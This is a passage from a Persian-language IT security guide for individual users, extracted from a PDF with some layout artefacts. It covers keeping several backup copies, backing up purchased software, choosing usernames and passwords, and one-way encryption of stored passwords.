ﺑﺎﺷﺪ ﺁﻳﺎ ﺍﻣﺮﻭﺯ ﻣﻲﺗﻮﺍﻥ ﺭﺍﻳﺎﻧﻪﺍﻱ ﺑﺎ ﺩﻳﺴﻚﮔﺮﺩﺍﻥ ﭘـﻨﺞ ﺍﻳﻨﭽـﻲ
ﺑﺮﺍﻱ ﺑﺎﺯﻳﺎﺑﻲ ﺁﻥ ﭘﻴﺪﺍ ﻛﺮﺩ؟
ﭼﻨﺪ ﻧﺴﺨﺔ ﭘﺸﺘﻴﺒﺎﻥ ﺑﺎﻳﺪ ﻧﮕﻬﺪﺍﺭﻱ ﺷﻮﺩ؟
ﺍﮔﺮ ﺷﻤﺎ ﻫﻔﺘﻪ ﺍﻱ ﻳﻜﺒﺎﺭ ﺍﺯ ﺁﻧﭽـﻪ ﺩﺍﺭﻳـﺪ ﭘـﺸﺘﻴﺒﺎﻥ ﺗﻬﻴـﻪ ﻛﻨﻴـﺪ
ﺩﺭﺻﻮﺭﺕ ﻣﻮﺍﺟﻬﻪ ﺑﺎ ﻳﻚ ﻓﺎﺟﻌﺔ ﻣﺼﻴﺒﺖﺑﺎﺭ ،ﺣﺪﺍﻛﺜﺮ ﺍﻃﻼﻋـﺎﺕ
ﻳﻚ ﻫﻔﺘـﻪ ﺭﺍ ﺍﺯ ﺩﺳـﺖ ﺧﻮﺍﻫﻴـﺪ ﺩﺍﺩ .ﺍﻧﺠـﺎﻡ ﺍﻳﻨﻜـﺎﺭ ﺍﺯ ﺩﻳـﺪﮔﺎﻩ
ﺍﻣﻨﻴﺘﻲ ﻗﺎﺑﻞ ﺗﻮﺟﻴﻪ ﺍﺳﺖ ﻭﻟﻲ ﺩﺭ ﻃﻮﻝ ﺯﻣﺎﻥ ﻓﻀﺎﻱ ﺍﺷﻐﺎﻝﺷﺪﻩ
ﺑﻮﺳﻴﻠﺔ ﭘﺸﺘﻴﺒﺎﻧﻬﺎ ﺑﻴﺸﺘﺮ ﻭ ﺑﻴﺸﺘﺮ ﻣـﻲﺷـﻮﺩ .ﭼـﻪ ﺗﻌـﺪﺍﺩ ﺍﺯ ﺍﻳـﻦ
ﭘﺸﺘﻴﺒﺎﻧﻬﺎ ﺭﺍ ﺑﺎﻳﺪ ﻧﮕﻪ ﺩﺍﺷﺖ؟ ﺍﮔﺮ ﺍﺯ ﺩﻳﺴﻜﻬﺎﻱ ﻣﻐﻨﺎﻃﻴﺴﻲ ﻭ ﻳﺎ
ﺩﻳﺴﻜﻬﺎﻱ ﻓﺸﺮﺩﻩ ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﻛﻨﻴﺪ ﺩﻟﻴﻠﻲ ﻧـﺪﺍﺭﺩ ﻛـﻪ ﺑﺨﻮﺍﻫﻴـﺪ
ﺁﻧﻬﺎ ﺭﺍ ﺳﺮﻳﻊ ﺩﻭﺭ ﺑﻴﺎﻧﺪﺍﺯﻳﺪ ،ﭼﻮﻥ ﺣﺠﻢ ﻛﻤـﻲ ﺩﺍﺭﻧـﺪ ﻭ ﻗﺎﺑﻠﻴـﺖ
ﺍﺳﺘﻔﺎﺩﺓ ﻣﺠﺪﺩ ﻫـﻢ ﻧﺪﺍﺭﻧـﺪ؛ ﺍﻣـﺎ ﻫﻤـﻮﺍﺭﻩ ﺑﺎﻳـﺪ ﭼﻨـﺪ ﻧـﺴﺨﻪ ﺍﺯ
ﭘﺸﺘﻴﺒﺎﻧﻬﺎ ﺭﺍ ﻧﮕﻬﺪﺍﺭﻳﺪ .ﺩﺭ ﺗﻤﺎﻡ ﻣﺜﺎﻟﻬﺎﻱ ﺑﺎﻻ ﻣﻲﺗـﻮﺍﻥ ﺍﺯ ﭼﻬـﺎﺭ
ﻧﺴﺨﺔ ﺁﺧﺮ ﻧﮕﻬﺪﺍﺭﻱ ﻛﺮﺩ.
ﭼﺮﺍ ﺑﻬﺘﺮ ﺍﺳﺖ ﺍﻳﻨﮕﻮﻧﻪ ﻋﻤﻞ ﺷﻮﺩ؟ ﭼﺮﺍ ﺑﺎﻳﺪ ﻧﺴﺨﺔ ﻣﺮﺑـﻮﻁ ﺑـﻪ
ﻣــﺎﻩ ﻗﺒــﻞ ﺭﺍ ﺩﺭ ﺷــﺮﺍﻳﻄﻲ ﻛــﻪ ﻧــﺴﺨﺔ ﺟﺪﻳــﺪﺗﺮﻱ ﻭﺟــﻮﺩ ﺩﺍﺭﺩ
ﻧﮕﻬﺪﺍﺭﻱ ﻛﺮﺩ؟ ﺩﻟﻴـﻞ ﺁﻥ ﺳـﺎﺩﻩ ﺍﺳـﺖ :ﻣﻤﻜـﻦ ﺍﺳـﺖ ﻧـﺴﺨﺔ
ﺁﺧﺮﻱ ﻛﻪ ﺍﻳﺠﺎﺩ ﻛﺮﺩﻩﺍﻳﺪ ﻗﺎﺑﻞ ﺧﻮﺍﻧﺪﻥ ﻧﺒﺎﺷﺪ ،ﮔﻢ ﺷﻮﺩ ،ﻭ ﻳﺎ ﺑﻪ
ﺳﺮﻗﺖ ﺭﻭﺩ .ﺩﺭ ﺍﻳﻨﺼﻮﺭﺕ ﻭﺍﺿﺢ ﺍﺳﺖ ﻛﻪ ﺍﮔﺮﭼـﻪ ﻧـﺴﺨﻪﻫـﺎﻱ
ﻼ ﺑـﻪ ﺭﻭﺯ ﻧﻴـﺴﺘﻨﺪ ،ﻭﻟـﻲ ﺑﻮﺩﻧـﺸﺎﻥ ﺑﻬﺘـﺮ ﺍﺯ
ﻣﺎﻫﻬﺎﻱ ﻗﺒﻠﻲ ﻛﺎﻣ ﹰ
ﻧﺒﻮﺩﻧﺸﺎﻥ ﺍﺳﺖ .ﺍﻳﻦ ﻣﻮﺭﺩ ﻳﻚ ﻣﺜﺎﻝ ﺩﻳﮕﺮ ﺍﺯ ﺍﻳﻦ ﻧﻜﺘـﻪ ﺍﺳـﺖ
ﻛﻪ ﺍﻳﻤﻨـﻲ ﺳـﻄﺢ ﺑـﺎﻻ ﺍﺯ ﻣﻌﻴﺎﺭﻫـﺎﻱ ﭼﻨﺪﮔﺎﻧـﻪ ﻭ ﺗـﺎ ﺣـﺪﻭﺩﻱ
ﺗﻜﺮﺍﺭﺷﺪﻩ ﺗﺸﻜﻴﻞ ﻣﻲﺷﻮﺩ.
ﺍﺯ ﻧﺮﻡﺍﻓﺰﺍﺭ ﺧﺮﻳﺪﺍﺭﻱﺷﺪﻩ ﭘﺸﺘﻴﺒﺎﻥ ﺗﻬﻴﻪ ﻛﻨﻴﺪ
ﺍﮔﺮ ﮔﻮﺍﻫﻲ ﻧﺮﻡﺍﻓﺰﺍﺭﻫﺎﻳﻲ ﻛﻪ ﺧﺮﻳﺪﺍﺭﻱ ﻛﺮﺩﻩﺍﻳـﺪ ﺍﻳـﻦ ﺍﺟـﺎﺯﻩ ﺭﺍ
ﻣﻲﺩﻫﺪ ،ﻫﻤﻴﺸﻪ ﺍﺯ ﺩﻳﺴﻜﻬﺎﻱ ﻓﺸﺮﺩﺓ ﻧﺮﻡ ﺍﻓﺰﺍﺭﻫﺎ ﻳـﻚ ﻧـﺴﺨﺔ
ﺛﺎﻧﻮﻳﻪ ﺗﻬﻴﻪ ﻛـﺮﺩﻩ ﻭ ﺍﺯ ﺁﻥ ﺑـﺮﺍﻱ ﻋﻤﻠﻴـﺎﺕ ﻧـﺼﺐ ﻭ ﭘـﺸﺘﻴﺒﺎﻧﻲ
ﺍﺳﺘﻔﺎﺩﻩ ﻧﻤﺎﻳﻴﺪ.
ﻣﻬﻤﺘﺮﻳﻦ ﻧﻜﺘﻪ ﺩﺭ ﻣﻮﺭﺩ ﻧﺴﺨﻪﻫﺎﻱ ﭘﺸﺘﻴﺒﺎﻥ
ﻣﻬﻤﺘﺮﻳﻦ ﻧﻜﺘﻪ ﺩﺭ ﻣﻮﺭﺩ ﻧﺴﺨﻪﻫﺎﻱ ﭘـﺸﺘﻴﺒﺎﻥ ﺍﻳـﻦ ﺍﺳـﺖ ﻛـﻪ
ﺗﻬﻴﺔ ﭘﺸﺘﻴﺒﺎﻥ ﺑﺎﻳﺪ ﺩﺭ ﻓﻮﺍﺻـﻞ ﺯﻣـﺎﻧﻲ ﻣـﻨﻈﻢ ﺻـﻮﺭﺕ ﺑﮕﻴـﺮﺩ.
ﺑﻌﻀﻲ ﺍﺷﺨﺎﺹ ﺯﺣﻤﺖ ﺗﻬﻴﺔ ﭘﺸﺘﻴﺒﺎﻥ ﺭﺍ ﺑﻪ ﺧﻮﺩ ﻧﻤـﻲﺩﻫﻨـﺪ ﻭ
ﻣﻤﻜﻦ ﺍﺳﺖ ﺑﻪ ﻋﻮﺍﻗﺐ ﺍﻳﻨﻜﺎﺭ ﺧﻮﺩ ﮔﺮﻓﺘـﺎﺭ ﺷـﻮﻧﺪ .ﺍﻳـﻦ ﺍﻓـﺮﺍﺩ
ﻋﻤﻮﻣﹰﺎ ﻭﻗﺘﻲ ﻫﻢ ﻛﻪ ﺑﺎ ﻣﺸﻜﻠﻲ ﺭﻭﺑﺮﻭ ﻣﻲﺷﻮﻧﺪ ﺗﺼﻮﺭ ﻣﻲﻛﻨﻨـﺪ
ﻣﺸﻜﻞ ﺩﻳﮕﺮ ﺗﻜﺮﺍﺭ ﻧﺨﻮﺍﻫﺪ ﺷﺪ .ﻫﻤﭽﻨﺎﻥ ﺗﻮﺻﻴﺔ ﻣﺎ ﺍﻳﻦ ﺍﺳـﺖ
ﻛﻪ ﺍﺯ ﻣﺨﺎﻃﺮﺓ ﺍﺣﺘﻤﺎﻟﻲ ﭘﻴﺸﮕﻴﺮﻱ ﻛﻨﻴﺪ ﻭ ﻧﺴﺨﺔ ﭘﺸﺘﻴﺒﺎﻥ ﺗﻬﻴﻪ
ﻧﻤﺎﻳﻴﺪ.
ﺗﺼﺪﻳﻖ ﻫﻮﻳﺖ
٢٣
ﺗﺼﺪﻳﻖ ﻫﻮﻳﺖ ﺍﻳﻦ ﺍﻣﻜﺎﻥ ﺭﺍ ﻓﺮﺍﻫﻢ ﻣﻲﻛﻨﺪ ﻛﻪ ﺭﺍﻳﺎﻧـﻪ ﺑﺪﺍﻧـﺪ
ﺷﻤﺎ ﭼﻪ ﻛﺴﻲ ﻫﺴﺘﻴﺪ .ﺍﻳﻦ ﺩﺍﻧﺎﻳﻲ ﺑﺎﻋﺚ ﻣﻲﺷﻮﺩ ﻛـﻪ ﺑﺘـﻮﺍﻥ ﺍﺯ
ﻻ ﺷﻤﺎ ﺑﺎ ﻳﻚ ﻧـﺎﻡ ﻛـﺎﺭﺑﺮﻱ ﻭ ﺭﻣـﺰ
ﺗﻘﻠﺐ ﺟﻠﻮﮔﻴﺮﻱ ﻛﺮﺩ .ﻣﻌﻤﻮ ﹰ
ﻋﺒﻮﺭ ﺷﻨﺎﺳﺎﻳﻲ ﻣﻲﺷﻮﻳﺪ ،ﻫﺮﭼﻨﺪ ﮔﻮﻧـﻪﻫـﺎﻱ ﻣﺨﺘﻠﻔـﻲ ﺍﺯ ﺍﻳـﻦ
ﺳﻴﺴﺘﻤﻬﺎﻱ ﺷﻨﺎﺳﺎﻳﻲ ﻭﺟﻮﺩ ﺩﺍﺭﺩ .ﻧﻜﺘﺔ ﻗﺎﺑﻞ ﺗﻮﺟـﻪ ﺍﻳـﻦ ﺍﺳـﺖ
ﻛﻪ ﺑﺎﻳﺪ ﻛﻠﻤﺎﺗﻲ ﺑﻌﻨﻮﺍﻥ ﺭﻣﺰ ﻋﺒﻮﺭ ﺑﻜﺎﺭ ﮔﺮﻓﺘﻪ ﺷﻮﻧﺪ ﻛـﻪ ﻧﺘـﻮﺍﻥ
Authentication
23
٦١
ﺑﺨﺶ ﺩﻭﻡ :ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﮐﺎﺭﺑﺮﺍﻥ ﻣﻨﻔﺮﺩ
ﺁﻧﻬﺎ ﺭﺍ ﺑﺮﺍﺣﺘﻲ ﺣﺪﺱ ﺯﺩ ﺗﺎ ﻣﻬﺎﺟﻤﺎﻥ ﻧﺘﻮﺍﻧﻨﺪ ﺁﻧﻬﺎ ﺭﺍ ﭘﻴﺪﺍ ﻛﻨﻨـﺪ.
ﺩﺭ ﻋﻴﻦ ﺣﺎﻝ ﺑﺎﻳﺪ ﻳﺎﺩﺁﻭﺭﻱ ﺁﻥ ﻛﻠﻤﺎﺕ ﺩﺭ ﺣﺎﻓﻈﻪ ﻧﻴﺰ ﺍﻣﻜﺎﻧﭙـﺬﻳﺮ
ﺑﺎﺷﺪ ﻭ ﺷﺨﺺ ﺁﻧﻬﺎ ﺭﺍ ﻓﺮﺍﻣﻮﺵ ﻧﻜﻨﺪ .ﺍﮔﺮ ﺷﻤﺎ ﻣﺮﺗﺒﹰﺎ ﺑﺎ ﺭﺍﻳﺎﻧﻪ ﻭ
ﭘﺎﻳﮕﺎﻩ ﻭﺏ ﺩﺭ ﺗﻤﺎﺱ ﺑﺎﺷﻴﺪ ﻗﺎﻋﺪﺗﹰﺎ ﺗﺎ ﻛﻨﻮﻥ ﻧﺎﻣﻬﺎﻱ ﻛـﺎﺭﺑﺮﻱ ﻭ
ﺭﻣﺰﻫﺎﻱ ﻋﺒﻮﺭ ﺯﻳﺎﺩﻱ ﺑﻪ ﺧﺎﻃﺮ ﺳﭙﺮﺩﻩﺍﻳـﺪ ،ﺍﻣـﺎ ﺍﮔـﺮ ﺁﻧﻬـﺎ ﺭﺍ ﺑـﺮ
ﺭﻭﻱ ﻳﻚ ﻛﺎﻏﺬ ﻧﺰﺩﻳﻚ ﺭﺍﻳﺎﻧﻪ ﻧﻮﺷﺘﻪﺍﻳﺪ ﺑﺎﻳﺪ ﺑﺪﺍﻧﻴﺪ ﻛﻪ ﺍﺯ ﺍﻣﻨﻴﺖ
ﺯﻳﺎﺩﻱ ﺑﺮﺧﻮﺭﺩﺍﺭ ﻧﻴﺴﺘﻨﺪ.
ﺍﻛﺜﺮ ﺳﻴﺴﺘﻤﻬﺎ ﺑﺮﺍﻱ ﺷﻨﺎﺳﺎﻳﻲ ﺍﻓـﺮﺍﺩ ﺍﺯ ﺁﻧﻬـﺎ ﻣـﻲﺧﻮﺍﻫﻨـﺪ ﻛـﻪ
ﺑﮕﻮﻧﻪﺍﻱ ﻫﻮﻳﺖ ﺧﻮﺩ ﺭﺍ ﺍﺣﺮﺍﺯ ﻛﻨﻨﺪ .ﺍﻳـﻦ ﻣـﺴﺌﻠﻪ ﻣـﻲﺗﻮﺍﻧـﺪ ﺑـﺎ
ﺩﺭﻳﺎﻓﺖ ﺍﻃﻼﻋﺎﺕ ﻣﺨﺘﻠﻔﻲ ﺍﻧﺠﺎﻡ ﺷـﻮﺩ :ﻧـﺎﻡ ﻛـﺎﺭﺑﺮﻱ ،ﺷـﻤﺎﺭﺓ
ﻋﻀﻮﻳﺖ ،ﺍﺳﻢ ﻋﻀﻮ ﻭ...؛ ﻛـﻪ ﺩﺭ ﺍﻳـﻦ ﻣﺒﺎﺣـﺚ ﻋﻤﻮﻣـﹰﺎ ﺍﺯ ﻧـﺎﻡ
ﻛﺎﺭﺑﺮﻱ ﺍﺳﺘﻔﺎﺩﻩ ﻣـﻲ ﺷـﻮﺩ .ﺩﺭ ﺑﻌـﻀﻲ ﺳﻴـﺴﺘﻤﻬﺎ ﺑﺠـﺎﻱ ﻧـﺎﻡ
ﻛــﺎﺭﺑﺮﻱ ﺍﺯ ﺁﺩﺭﺱ ﭘــﺴﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜــﻲ ﺍﺳــﺘﻔﺎﺩﻩ ﻣــﻲﺷــﻮﺩ .ﺩﺭ
ﺣﻘﻴﻘﺖ ﺩﺭ ﺍﻳـﻦ ﺳﻴـﺴﺘﻤﻬﺎ ﺁﺩﺭﺱ ﭘـﺴﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜـﻲ ﺑﻌﻨـﻮﺍﻥ
ﻧﻤﺎﺩﻱ ﺧﺎﺹ ﺍﺯ ﻧﺎﻡ ﻛﺎﺭﺑﺮﻱ ﺗﻠﻘﻲ ﻣﻲﮔـﺮﺩﺩ .ﺩﺭ ﺧـﺼﻮﺹ ﻧـﺎﻡ
ﻛﺎﺭﺑﺮﻱ ﻗﻮﺍﻧﻴﻦ ﻣﺨﺘﻠﻔﻲ ﻣﻲﺗﻮﺍﻧﺪ ﻭﺟﻮﺩ ﺩﺍﺷﺘﻪ ﺑﺎﺷﺪ:
•
ﺑﻌﻀﻲ ﺍﺯ ﺳﻴﺴﺘﻤﻬﺎ ﻃﻮﻝ ﺍﺳﻢ ﺭﺍ ﻣﺤﺪﻭﺩ ﻣﻲﻛﻨﻨـﺪ ﻭﻟـﻲ
ﺑﻌﻀﻲ ﺩﻳﮕﺮ ﺑﺮﺍﻱ ﺁﻥ ﻣﺤﺪﻭﺩﻳﺘﻲ ﻗﺎﺋﻞ ﻧﻤﻲﺷﻮﻧﺪ.
•
ﺩﺭ ﺑﻌﻀﻲ ﺍﺯ ﺳﻴﺴﺘﻤﻬﺎ ﻣﻲﺗﻮﺍﻥ ﺍﺯ ﻫـﺮ ﻋﻼﻣﺘـﻲ -ﻛـﻪ
ﺑﻮﺳﻴﻠﺔ ﺻﻔﺤﻪﻛﻠﻴﺪ ﻗﺎﺑﻞ ﻧﻮﺷﺘﻦ ﺑﺎﺷﺪ -ﺩﺭ ﺗﺮﻛﻴﺐ ﻧـﺎﻡ
ﻛــﺎﺭﺑﺮﻱ ﺍﺳــﺘﻔﺎﺩﻩ ﻛــﺮﺩ ،ﻭﻟــﻲ ﺑﻌــﻀﻲ ﺩﻳﮕــﺮ ﻓﻘــﻂ ﺩﺭ
ﻣﺤﺪﻭﺩﺓ ﺣـﺮﻭﻑ ﻭ ﺍﻋـﺪﺍﺩ ﻭ ﻓﻘـﻂ ﺍﻧـﺪﻛﻲ ﺩﺭ ﻣﺤـﺪﻭﺩﺓ
ﻋﻼﺋﻢ ﻛﺎﺭ ﻣﻲﻛﻨﻨﺪ.
•
ﺑﻌﻀﻲ ﺳﻴﺴﺘﻤﻬﺎ ﺣـﺮﻭﻑ ﺑـﺰﺭﮒ ﻭ ﻛﻮﭼـﻚ ﺭﺍ ﻳﻜـﺴﺎﻥ
ﺩﺭﻧﻈﺮ ﻣﻲﮔﻴﺮﻧﺪ ﻭﻟﻲ ﺑﻌﻀﻲ ﺩﻳﮕﺮ ﺑﺎ ﺁﻧﻬـﺎ ﺑـﻪ ﻣﻨﺰﻟـﺔ ﺩﻭ
ﺣﺮﻑ ﻣﺘﻔﺎﻭﺕ ﺑﺮﺧﻮﺭﺩ ﻣﻲﻛﻨﻨﺪ.
ﺍﮔﺮ ﺳﻴﺴﺘﻢ ﺑﻪ ﺷﻤﺎ ﺍﻣﻜﺎﻥ ﺍﻧﺘﺨﺎﺏ ﻧﺪﻫـﺪ ،ﻧـﺎﻡ ﻛـﺎﺭﺑﺮﻱ ﺷـﻤﺎ
ﻫﻤﺎﻧﻲ ﺧﻮﺍﻫﺪ ﺑﻮﺩ ﻛﻪ ﺑﻮﺳﻴﻠﺔ ﺳﻴﺴﺘﻢ ﺗﻌﻴﻴﻦ ﺷﺪﻩ ﺍﺳﺖ .ﺍﻣﺎ ﺍﮔﺮ
ﻻﺯﻡ ﺑﺎﺷﺪ ﺧﻮﺩﺗﺎﻥ ﻧﺎﻡ ﻛﺎﺭﺑﺮ ﺭﺍ ﺗﻌﻴﻴﻦ ﻛﻨﻴﺪ ﭼﻪ ﻧﻜـﺎﺗﻲ ﺭﺍ ﺑﺎﻳـﺪ
ﻣﺪ ﻧﻈﺮ ﻗﺮﺍﺭ ﺩﻫﻴﺪ؟ ﺑﻌﻀﻲ ﻣﻮﺍﺭﺩ ﺩﺭ ﺯﻳﺮ ﺁﻣﺪﻩ ﺍﺳﺖ:
•
ﺁﻳﺎ ﺩﺭﻧﻈﺮ ﺩﺍﺭﻳﺪ ﻧﺎﻡ ﻛﺎﺭﺑﺮﻱ ﻧـﺸﺎﻧﺪﻫﻨﺪﺓ ﻫﻮﻳـﺖ ﻭﺍﻗﻌـﻲ
ﺷﻤﺎ ﺑﺎﺷﺪ؟ ﺁﻳﺎ ﻗﺮﺍﺭ ﺍﺳـﺖ ﺍﻳـﻦ ﺍﺳـﻢ ﻛﻤـﻚ ﻛﻨـﺪ ﻛـﻪ
ﺩﻭﺳﺘﺎﻥ ﻭ ﻫﻤﻜﺎﺭﺍﻧﺘﺎﻥ ﺷـﻤﺎ ﺭﺍ ﺑـﺸﻨﺎﺳﻨﺪ؟ ﻳـﻚ ﺁﺩﺭﺱ
•
ﺁﻳﺎ ﻣﻲﺧﻮﺍﻫﻴﺪ ﺑﺎ ﺍﻧﺘﺨﺎﺏ ﻧﺎﻡ ﻣﻮﺭﺩ ﻧﻈـﺮ ﻫﻮﻳـﺖ ﻭﺍﻗﻌـﻲ
ﺧﻮﺩ ﺭﺍ ﭘﻨﻬﺎﻥ ﻧﮕﻪ ﺩﺍﺭﻳﺪ؟ ﺍﮔﺮ ﺑﻮﺳﻴﻠﺔ ﺍﻳﻦ ﻧـﺎﻡ ﻛـﺎﺭﺑﺮﻱ
ﻼ ﻳـﻚ ﺑـﺎﺯﻱ
ﺩﺭ ﻳﻚ ﻓﻌﺎﻟﻴﺖ ﮔﺮﻭﻫﻲ ﺷﺮﻛﺖ ﻣﻲﻛﻨﻴﺪ )ﻣﺜ ﹰ
ﺍﻳﻨﺘﺮﻧﺘﻲ( ﺷﺎﻳﺪ ﻧﺨﻮﺍﻫﻴﺪ ﺩﻳﮕﺮﺍﻥ ﻫﻮﻳـﺖ ﻭﺍﻗﻌـﻲ ﺷـﻤﺎ ﺭﺍ
ﺑﺪﺍﻧﻨﺪ.
•
ﺁﻳﺎ ﻣﻲﺧﻮﺍﻫﻴﺪ ﻧﺎﻣﻲ ﺍﻧﺘﺨﺎﺏ ﻛﻨﻴﺪ ﻛﻪ ﻳﺎﺩﺁﻭﺭﻱ ﺁﻥ ﺁﺳﺎﻥ
ﺑﺎﺷﺪ؟ ﭼﻨﺎﻧﭽﻪ ﺍﺯ ﻳﻚ ﺧﺪﻣﺖ ﺑﺮﺧﻂ ٢٤ﺍﺳﺘﻔﺎﺩﻩ ﻛﻨﻴﺪ ﻛـﻪ
ﺑﻪ ﻧﺪﺭﺕ ﺁﻧﺮﺍ ﺑﻜﺎﺭ ﻣﻲ ﮔﻴﺮﻳﺪ ﻣﻤﻜﻦ ﺍﺳﺖ ﻣﺎﻳﻞ ﺑﺎﺷﻴﺪ ﺍﺯ
ﺍﺳﻤﻲ ﺍﺳﺘﻔﺎﺩﻩ ﻛﻨﻴﺪ ﻛﻪ ﺑﺮﺍﺣﺘﻲ ﺩﺭ ﺫﻫﻦ ﺑﻤﺎﻧـﺪ .ﺑﻌـﻀﻲ
ﺍﻓﺮﺍﺩ ﺑﺮﺍﻱ ﺧﺪﻣﺎﺕ ﻣﺨﺘﻠﻒ ﺍﺯ ﻳﻚ ﻧﺎﻡ ﻛﺎﺭﺑﺮﻱ ﺍﺳـﺘﻔﺎﺩﻩ
ﻣﻲﻛﻨﻨﺪ ،ﺧـﺼﻮﺻﹰﺎ ﺍﮔـﺮ ﺁﻥ ﺧـﺪﻣﺎﺕ ﺑـﺎ ﻧﻜﺘـﺔ ﻣﻬـﻢ ﻭ
ﺣﺴﺎﺳﻲ ﺩﺭ ﺍﺭﺗﺒﺎﻁ ﻧﺒﺎﺷﻨﺪ.
•
ﺁﻳﺎ ﻣﻲﺧﻮﺍﻫﻴﺪ ﺣﺪﺱ ﺯﺩﻥ ﻧﺎﻣﻲ ﻛﻪ ﺑﻜﺎﺭ ﻣﻲﺑﺮﻳﺪ ﺑـﺮﺍﻱ
ﺩﻳﮕﺮﺍﻥ ﻣﺸﻜﻞ ﺑﺎﺷﺪ؟ ﻧﺎﻡ ﻛﺎﺭﺑﺮﻱ ﺣﺴﺎﺏ ﺑـﺎﻧﻜﻲ ﺷـﻤﺎ
ﺑﺎﻳﺪ ﺑﮕﻮﻧﻪﺍﻱ ﺗﻌﻴﻴﻦ ﺷﻮﺩ ﻛﻪ ﺩﻳﮕﺮﺍﻥ ﻧﺘﻮﺍﻧﻨﺪ ﺑﻪ ﺭﺍﺣﺘـﻲ
ﺁﻧﺮﺍ ﺣﺪﺱ ﺑﺰﻧﻨﺪ )ﺟﻬﺖ ﺗﺄﻣﻴﻦ ﺍﻣﻨﻴـﺖ ﻻﺯﻡ ﺑﺎﻳـﺪ ﺍﺯ ﭘـﺸﺘﻴﺒﺎﻧﻲ
ﭼﻨﺪﻻﻳﻪ ﺍﺳﺘﻔﺎﺩﻩ ﻛﺮﺩ .ﺍﮔﺮ ﺍﺯ ﺁﺩﺭﺱ ﭘﺴﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻚ ﻋﻤﻮﻣﻲ ﺧﻮﺩ
ﺑﺮﺍﻱ ﻭﺭﻭﺩ ﺑﻪ ﺳﻴﺴﺘﻢ ﺑﺎﻧﻜﻲ ﺍﺳﺘﻔﺎﺩﻩ ﻛﻨﻴـﺪ ،ﺣـﺪﺱﺯﺩﻥ ﺁﻥ ﺑـﺮﺍﻱ
ﺳﺎﺭﻗﺎﻥ ﺳﺎﺩﻩﺗﺮ ﺧﻮﺍﻫﺪ ﺑﻮﺩ(.
ﺭﻣﺰ ﻋﺒﻮﺭ
ﺩﺭ ﺑﻌــﻀﻲ ﺳﻴــﺴﺘﻤﻬﺎ ﻧــﺎﻡ ﻛــﺎﺭﺑﺮﻱ ﺍﺯ ﺳــﻮﻱ ﺳﻴــﺴﺘﻢ ﺗﻌﻴــﻴﻦ
ﻣﻲﺷﻮﺩ ،ﻭﻟﻲ ﺭﻣﺰ ﻋﺒﻮﺭ ﻛﻠﻤﻪﺍﻱ ﺍﺳﺖ ﻛﻪ ﺩﺭ ﻫﺮ ﺻﻮﺭﺕ ﺗﻮﺳﻂ
ﻛﺎﺭﺑﺮ ﺗﻌﻴﻴﻦ ﻣﻲﮔﺮﺩﺩ ﻭ ﺷﻜﻞ ﺁﻥ ﻧﻴﺰ ﺑﺎﻳﺪ ﺑﮕﻮﻧـﻪﺍﻱ ﺑﺎﺷـﺪ ﻛـﻪ
ﺣﺪﺱ ﺯﺩﻧﺶ ﺗﻮﺳﻂ ﺍﺷﺨﺎﺹ ﺩﻳﮕﺮ ﺩﺷﻮﺍﺭ ﺑﺎﺷﺪ.
ﺯﻣﺎﻧﻴﻜﻪ ﺭﻣﺰﻫﺎﻱ ﻋﺒﻮﺭ ﺩﺭ ﺳﻴـﺴﺘﻢ ﻣﻴﺰﺑـﺎﻥ ﺫﺧﻴـﺮﻩ ﻣـﻲﺷـﻮﻧﺪ
ﻻ ﺭﻣﺰﮔﺬﺍﺭﻱ ﻣﻲ ﺷﻮﻧﺪ ﺗﺎ ﺍﮔﺮ ﻛﺴﻲ ﺑﻪ ﺩﻳﺴﻚ ﺩﺳﺘﺮﺳـﻲ
ﻣﻌﻤﻮ ﹰ
ﭘﻴﺪﺍ ﻛﺮﺩ ﻗﺎﺩﺭ ﺑﻪ ﻣﺸﺎﻫﺪﺓ ﺭﻣﺰﻫﺎﻱ ﻋﺒﻮﺭ ﻧﺒﺎﺷﺪ .ﺩﺭ ﺑﻌﻀﻲ ﻣﻮﺍﺭﺩ
ﺍﻳﻦ ﺭﻣﺰﮔﺬﺍﺭﻱ ﺑﮕﻮﻧﻪﺍﻱ ﺍﺳﺖ ﻛﻪ ﺍﻣﻜﺎﻥ ﺭﻣﺰﮔﺸﺎﻳﻲ ﺭﻣﺰﻫـﺎﻱ
ﻋﺒﻮﺭ ﻭﺟﻮﺩ ﻧﺪﺍﺭﺩ ﻛﻪ ﺑﻪ ﺁﻥ ﺭﻣﺰﮔﺬﺍﺭﻱ ﻳﻜﺴﻮﻳﻪ ٢٥ﻣﻲﮔﻮﻳﻨﺪ .ﺩﺭ
ﺍﻳﻦ ﺳﻴﺴﺘﻤﻬﺎ ﻭﻗﺘﻲ ﺑﺮﺍﻱ ﻭﺭﻭﺩ ﺑﻪ ﺳﻴـﺴﺘﻢ ﺭﻣـﺰ ﻋﺒـﻮﺭ ﺭﺍ ﻭﺍﺭﺩ
ﻣﻲﻛﻨﻴﺪ ،ﺍﺑﺘﺪﺍ ﺭﻣﺰﮔﺬﺍﺭﻱ ﻣﻲﺷﻮﺩ ﻭ ﺳﭙﺲ ﺑﺎ ﻧﺴﺨﺔ ﺫﺧﻴﺮﻩﺷﺪﻩ
Online Service
One-way Encryption
24
25
ﺑﺨﺶ ﺩﻭﻡ
ﺷﻨﺎﺳﺎﻳﻲ ﻛﺎﺭﺑﺮ
ﻻ ﺑﻌﻨﻮﺍﻥ ﻳﻚ ﭼﻨﻴﻦ ﻧﻤـﺎﺩﻱ ﺍﺯ
ﭘﺴﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﻣﻌﻤﻮ ﹰ
ﻛﺎﺭﺑﺮ ﺗﻠﻘﻲ ﻣﻲﺷﻮﺩ.
٦٢
ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ
ﺩﺭ ﺩﻳﺴﻚ ﻣﻘﺎﻳﺴﻪ ﻣﻲﮔﺮﺩﺩ )ﺑﺮﺍﻱ ﺟﺰﺋﻴﺎﺕ ﺑﻴﺸﺘﺮ ﺑﻪ ﺿﻤﻴﻤﺔ ۱ﻫﻤﻴﻦ
•
